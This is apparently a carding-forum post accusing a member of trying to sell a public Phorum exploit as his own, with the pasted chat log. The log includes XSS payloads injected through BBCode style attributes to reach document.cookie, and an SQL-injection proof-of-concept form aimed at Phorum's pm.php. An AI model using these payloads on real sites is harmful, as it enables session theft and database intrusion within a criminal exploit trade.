Hey
carder2012 is a RIPPER
link to profile: http://carder.market/member.php?u=50788
So this retard tried to scamm me for Phorum exploit, which obviously he doesnt have, he said he worked with his team on it yesterday and he want 700$ LR for it.
Chat logs from yahoo:
Obvious scamm is obvious.
carder2012 is a RIPPER
link to profile: http://carder.market/member.php?u=50788
So this retard tried to scamm me for Phorum exploit, which obviously he doesnt have, he said he worked with his team on it yesterday and he want 700$ LR for it.
Chat logs from yahoo:
Code:
carder2012: expolit ready. guys dont want to share. howver ready to sell via escrow .safe and sound. let me know when you need.
3:31:21 PM
[email protected]: proof
3:31:57 PM
carder2012: escrow is proof of everything Man.
3:32:04 PM
[email protected]: no its not
3:32:16 PM
carder2012: you will pay money to 3rd party not us
3:32:22 PM
[email protected]: show me proof
3:32:27 PM
[email protected]: shouldnt be a problem for u
3:32:44 PM
carder2012: ok
3:34:07 PM
carder2012: sending a bit codes.
3:34:18 PM
carder2012: [size=20px;xss:expression(alert(document.cookie));]Sysdream Testing XSS[/size]
The application convert it into the follow HTML code :
<span style="color:#000000;xss:expression(alert(document.cookie));">Sysdream Testing XSS</span>
and
<span style="font-size: 20px;xss:expression(alert(document.cookie));">Sysdream Testing XSS</span>
For IE6 you can use this POC:
[color=#000000;background-image:url(javascript:alert('Sysdream_IE6_Alert'));]Sysdream
Testing IE6[/color]
For IE7:
[color=#000000;xss:expression(alert('Sysdream_IE7_Alert'));]Sysdream Testing
XSS[/color]
Obviously, the POC doesn't work in IE8 and Firefox.
But, but , but...
Uploading htc (for IE8) or xml (for FF) file on the phorum using the "My
Files" function in "Control Center", you can use :
POC for FF:
[color=#000000;-moz-binding:
3:35:41 PM
carder2012: you know coding?
3:35:56 PM
[email protected]: how does this proove anything
3:36:18 PM
[email protected]: its some XSS
3:36:41 PM
[email protected]: "Obviously, the POC doesn't work in IE8 and Firefox."
3:37:01 PM
carder2012: very easy. i will describe and send all material you in email, or will upload and share link.
3:37:19 PM
carder2012: no. its only to show some or little info related
3:37:40 PM
carder2012: you know how important it is
3:37:42 PM
[email protected]: sorry but im not going to send you 700$ without any good proof
3:38:35 PM
carder2012: i am not greedy for $700. let me ask from guys.if they agree small upfront. i can send you all info
3:38:42 PM
carder2012: later we work for %
3:39:03 PM
carder2012: rest of work you do OK?
3:39:09 PM
[email protected]: im not paying anything upfront
3:39:11 PM
[email protected]: show me proof
3:39:14 PM
[email protected]: instead of some shitty code
3:39:24 PM
[email protected]: make screenshot
3:45:01 PM
carder2012: How to use file: full function
3:45:05 PM
carder2012: As we can see, if "$user_id" is array, then there is no sanitize against data before
using in sql query.
After some research I have found a way to use this bug for sql injection. For this,
first of all, potential attacker must have valid user account in specific Phorum-powered
website and he/she must be logged in. And then let's try this proof-of-concept html file:
------------------[PoC exploit]-----------------------
Zhtml>
Zbody>
<form action="http://localhost/phorum.5.1.20/pm.php" method="post">
<input type="hidden" name="recipients[1) OR foobar=123/* ]" value="waraxe">
<input type="submit" name"test" value="test">
</body>
</html>
------------------[/PoC exploit]----------------------
Of course, "action" parameter must be modified to match real target.
As testing result we will see s
3:45:37 PM
carder2012: Still not satisfy. then try your luck to find better guy
3:46:13 PM
[email protected]: http://www.exploit-db.com/exploits/9231/
Obvious scamm is obvious.